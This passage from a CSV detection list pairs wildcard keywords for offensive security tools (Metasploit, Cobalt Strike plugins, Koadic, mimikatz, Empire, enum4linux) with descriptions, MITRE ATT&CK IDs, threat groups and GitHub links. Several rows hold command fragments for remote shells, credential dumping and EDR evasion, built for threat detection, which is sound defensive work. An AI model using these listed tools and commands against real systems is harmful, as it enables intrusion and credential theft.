- T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/lengjibo/NetUser,1,1,N/A,10,10,410,90,2021-09-29T14:22:09Z,2020-01-09T08:33:27Z -*enigma_fileless_uac_bypass*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*enigma0x3*,offensive_tool_keyword,Github Username,Github Author of malicious script and eploitaiton tools ,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/enigma0x3,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*enkomio/AlanFramework*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*enpass2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*enpass5tojohn.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential 
Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*Enter-SMBSession -ComputerName *,offensive_tool_keyword,Invoke-SMBRemoting,Interactive Shell and Command Execution over Named-Pipes (SMB),T1059 - T1021.002 - T1572,TA0002 - TA0008 - TA0011,N/A,N/A,Lateral Movement,https://github.com/Leo4j/Invoke-SMBRemoting,1,0,N/A,9,1,22,4,2023-10-02T10:21:34Z,2023-09-06T16:00:47Z -*Enter-SMBSession* -PipeName * -ServiceName *,offensive_tool_keyword,Invoke-SMBRemoting,Interactive Shell and Command Execution over Named-Pipes (SMB),T1059 - T1021.002 - T1572,TA0002 - TA0008 - TA0011,N/A,N/A,Lateral Movement,https://github.com/Leo4j/Invoke-SMBRemoting,1,0,N/A,9,1,22,4,2023-10-02T10:21:34Z,2023-09-06T16:00:47Z -*Enter-WmiShell *,offensive_tool_keyword,Wmisploit,WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.,T1087 - T1059.001 - T1047,TA0003 - TA0002 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/secabstraction/WmiSploit,1,0,N/A,N/A,2,163,39,2015-08-28T23:56:00Z,2015-03-15T03:30:02Z -*Enter-WmiShell.ps1*,offensive_tool_keyword,Wmisploit,WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.,T1087 - T1059.001 - T1047,TA0003 - TA0002 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/secabstraction/WmiSploit,1,1,N/A,N/A,2,163,39,2015-08-28T23:56:00Z,2015-03-15T03:30:02Z -*--entrypoint Dinjector*,offensive_tool_keyword,Dinjector,Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL,T1055 - T1055.012 - T1055.001 - T1027.002,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Metro-Holografix/DInjector,1,0,private github repo,10,,N/A,,, -*enum_artifacts_list.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*enum_av_excluded.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*enum_avproducts.py*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*enum_brocade.md*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*enum_domain_info.py*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. 
The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*enum_firefox.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*enum_hostfile.md*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*enum_logged_on_users*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*enum_logged_on_users.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*enum_mikrotik.md*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*enum_ms_product_keys.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*enum_printers.py*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*enum_shares.py*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*enum_shares.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*enum_vmware.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*enum_vyos.md*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*enum4linux*,offensive_tool_keyword,enum4linux,Enum4linux is a tool for enumerating information from Windows and Samba systems. 
It attempts to offer similar functionality to enum.exe ,T1018 - T1087.002 - T1135 - T1049 - T1033,TA0007 - TA0009,N/A,N/A,Reconnaissance,https://github.com/CiscoCXSecurity/enum4linux,1,1,N/A,N/A,10,944,228,2023-05-09T22:54:24Z,2015-07-31T21:06:03Z
-*enum4linux_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z
-*enum4linux-ng -A -u *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*EnumCLR.exe*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF to identify processes with the CLR loaded with a goal of identifying SpawnTo / injection candidates.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - 
FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://gist.github.com/G0ldenGunSec/8ca0e853dd5637af2881697f8de6aecc,1,1,N/A,10,10,N/A,N/A,N/A,N/A
-*Enum-Creds*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-*enumerate.cna*,offensive_tool_keyword,red-team-scripts,Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host 
enumeration with Beacon built-in commands (i.e. no Powershell. binary calls. or process injection). Additionally. adds a basic enumerate alias for Linux based systems in SSH sessions.,T1595 T1590 T1591,N/A,N/A,N/A,Reconnaissance,https://github.com/threatexpress/red-team-scripts,1,1,N/A,N/A,10,1089,197,2019-11-18T05:30:18Z,2017-05-01T13:53:05Z
-*EnumerateAllDomainControllers*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z
-*Enumerate-AllHighPrivilegePrincipals*,offensive_tool_keyword,Azure-AccessPermissions,Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/csandker/Azure-AccessPermissions,1,0,N/A,6,1,90,16,2023-02-21T06:46:24Z,2022-10-19T10:33:24Z
-*EnumerateDomainGpo*,offensive_tool_keyword,Group3r,Find vulnerabilities in AD Group Policy,T1484.002 - T1069.002 - T1087.002,TA0007 - TA0040,N/A,N/A,AD Enumeration,https://github.com/Group3r/Group3r,1,0,N/A,N/A,5,488,47,2023-08-07T16:45:14Z,2021-07-05T05:05:42Z
-*Enumerate-MFAStatusOfHighPrivilegePrincipals*,offensive_tool_keyword,Azure-AccessPermissions,Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/csandker/Azure-AccessPermissions,1,0,N/A,6,1,90,16,2023-02-21T06:46:24Z,2022-10-19T10:33:24Z
-*Enumeration/DesktopACL*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,1,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z
-*Enumeration\DesktopAC*,offensive_tool_keyword,Tokenvator,A tool to elevate 
privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,0,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z
-*env_var_spoofing_poc.cpp*,offensive_tool_keyword,ETW,stop ETW from giving up your loaded .NET assemblies to that pesky EDR but can't be bothered patching memory? Just pass COMPlus_ETWEnabled=0 as an environment variable during your CreateProcess call,T1055.001 - T1059.001 - T1562.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://gist.github.com/xpn/64e5b6f7ad370c343e3ab7e9f9e22503,1,0,N/A,10,10,N/A,N/A,N/A,N/A
-*eo.oe.kiwi*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z
-*eppiocemhmnlbhjplcgkofciiegomcon*,greyware_tool_keyword,Urban Free VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A
-*Erebus/*spacerunner*,offensive_tool_keyword,cobaltstrike,Erebus CobaltStrike post penetration testing plugin,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - 
T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/DeEpinGh0st/Erebus,1,1,N/A,10,10,1356,214,2021-10-28T06:20:51Z,2019-09-26T09:32:00Z
-*error in libcrypto*,greyware_tool_keyword,ssh,Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml,1,0,greyware tool - risks of False positive !,N/A,10,4099,1019,2023-08-09T15:42:59Z,2013-09-17T17:07:58Z
-*eRv6yTYhShell*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,1,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z
-*ES.Alan.Core/*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z
-*EspressoCake/PPLDump_BOF*,offensive_tool_keyword,cobaltstrike,A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/PPLDump_BOF,1,1,N/A,10,10,131,24,2021-09-24T07:10:04Z,2021-09-24T07:05:59Z
-*Eternalblue-*.exe*,offensive_tool_keyword,viperc2,vipermsf Metasploit - Viper is a graphical 
